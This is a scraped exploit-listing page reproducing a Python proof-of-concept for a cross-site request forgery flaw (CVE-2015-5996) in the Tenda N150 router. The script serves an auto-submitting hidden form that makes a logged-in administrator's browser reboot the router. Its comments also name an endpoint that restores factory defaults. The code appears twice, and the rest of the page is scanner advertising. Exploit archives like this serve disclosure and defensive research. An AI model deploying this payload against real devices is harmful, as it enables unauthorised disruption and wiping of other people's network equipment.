tenda wireless n150 router 5.07.50 crosssite request forgery (reboot router)

▸▸▸ Exploit & Vulnerability >>   webapps exploit & hardware vulnerability




tenda wireless n150 router 5.07.50 crosssite request forgery (reboot router) Code Code...
				
# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router) # Date: 2018-07-21 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co # CVE: CVE-2015-5996 # # Description: # # The router is vulnerable to a cross-site request forgery attacker. # If an administrator is currently logged in and visits a # remote webpage containing forms existing in the router's firmware, # a request can be forged to modify existing settings or even # set the router to its default state. # # These are two examples that can work in the proof of concept: # /goform/SysToolReboot - Reboot the router # /goform/SysToolRestoreSet - Set the router to default settings # # Reference: https://www.kb.cert.org/vuls/id/630872 import socket server_ip = "0.0.0.0" server_port = 80 router_ip = "192.168.0.1" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((server_ip, server_port)) sock.listen(1) print "Currently listening at " + server_ip + ":" + str(server_port) client, (client_host, client_port) = sock.accept() print "Client connected: " + client_host + ":" + str(client_port) print "" print client.recv(1000) client.send('HTTP/1.0 200 OK\r\n') client.send('Content-Type: text/html\r\n') client.send('\r\n') client.send(""" <html> <body> <form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot"> <input name="CMD" value="SYS_CONF" type="hidden"> <input name="GO" value="system_reboot.asp" type="hidden"> <input name="CCMD" value="0" type="hidden"> </form> <script> document.getElementById("frmSetup").submit(); </script> </body> </html> """) client.close() sock.close() # Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router) # Date: 2018-07-21 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co # CVE: CVE-2015-5996 # # Description: # # The router is vulnerable to a cross-site request forgery attacker. # If an administrator is currently logged in and visits a # remote webpage containing forms existing in the router's firmware, # a request can be forged to modify existing settings or even # set the router to its default state. # # These are two examples that can work in the proof of concept: # /goform/SysToolReboot - Reboot the router # /goform/SysToolRestoreSet - Set the router to default settings # # Reference: https://www.kb.cert.org/vuls/id/630872 import socket server_ip = "0.0.0.0" server_port = 80 router_ip = "192.168.0.1" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((server_ip, server_port)) sock.listen(1) print "Currently listening at " + server_ip + ":" + str(server_port) client, (client_host, client_port) = sock.accept() print "Client connected: " + client_host + ":" + str(client_port) print "" print client.recv(1000) client.send('HTTP/1.0 200 OK\r\n') client.send('Content-Type: text/html\r\n') client.send('\r\n') client.send(""" <html> <body> <form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot"> <input name="CMD" value="SYS_CONF" type="hidden"> <input name="GO" value="system_reboot.asp" type="hidden"> <input name="CCMD" value="0" type="hidden"> </form> <script> document.getElementById("frmSetup").submit(); </script> </body> </html> """) client.close() sock.close()

Tenda wireless n150 router 5.07.50 crosssite request forgery (reboot router) Vulnerability / Exploit Source : Tenda wireless n150 router 5.07.50 crosssite request forgery (reboot router)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.